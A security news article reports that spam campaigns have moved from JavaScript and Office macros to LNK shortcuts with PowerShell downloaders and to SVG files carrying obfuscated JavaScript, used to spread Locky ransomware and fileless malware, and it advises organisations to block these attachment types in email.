Cybercriminals Switch File Types to Infect More Organizations with Malware

During the past year, spam volume increased considerably, as did the percentage of those emails that were malicious. The increase in malicious messages coincided with increased botnet activity. Botnets are now being used to send large-scale malware and ransomware campaigns. While spam email delivery of malware may have fallen out of favor in recent years, that is clearly no longer the case.

During 2016, cybercriminals favored malicious Office macros and JavaScript for downloading their malicious payloads. However, the Microsoft Malware Protection Center has identified a new trend. Rather than JavaScript, which is becoming easier to identify and block, cybercriminals have turned to less suspicious looking file types to infect end users.

Large-scale spamming campaigns are now being conducted that distribute malicious LNK and SVG files. These files are less likely to arouse suspicions than JavaScript and may make it past anti-spam defenses. LNK files – Windows shortcut files – are combined with PowerShell scripts which download malicious payloads when opened. Over the past year, PowerShell scripts have been used to download ransomware variants such as Locky.

Microsoft’s Malware Protection Center has identified one campaign that uses LNK files which attempts to download Locky from five different domains. “The use of multiple domains and the technique of storing the rest of the URL as a parameter is a way to circumvent URL filtering solutions. All the script needs is one URL that is not blocked in order to successfully download malware,” warns Microsoft.

Not all campaigns are used to download malicious files. Fileless malware is becoming more popular. Since PowerShell scripts are run directly in the memory, no file download is necessary. Malicious code remains in the memory. Even if endpoint security has been implemented, those solutions are unlikely to detect these fileless malware attacks.

Organizations can improve defenses against these fileless malware attacks by setting PowerShell policies to restricted, but is a relatively easy process to bypass these security policies and still run the scripts.

SVG – Scalable Vector Graphics – files are image files; however, it is relatively easy to incorporate obfuscated JavaScript into the files. Opening the file attachment will launch the JavaScript, which in turn will download the malware or ransomware.  SVG files are opened using browsers and the image will be displayed even if JavaScript has been incorporated into the file. End users who open these files are therefore unlikely to realize that malware is being silently downloaded.

Many organizations have responded to the threat of JavaScript downloaders by blocking their delivery through their spam filtering solutions. The change to PowerShell scripts could potentially see spam controls bypassed. To deal with the threat, organizations should also configure their spam filtering solutions to block LNK files. Since these file types are rarely sent in legitimate emails, blocking LNK files is unlikely to cause any problems.

SCG files are more commonly used, although organizations should consider also blocking these image types from delivery via email. If images do need to be sent, polices can be developed to require these file types to be communicated via other means, via Google Drive or Dropbox for example.

Author: Steve Alder has many years of experience as a journalist, and comes from a background in market research. He is a specialist on legal and regulatory affairs, and has several years of experience writing about HIPAA. Steve holds a B.Sc. from the University of Liverpool.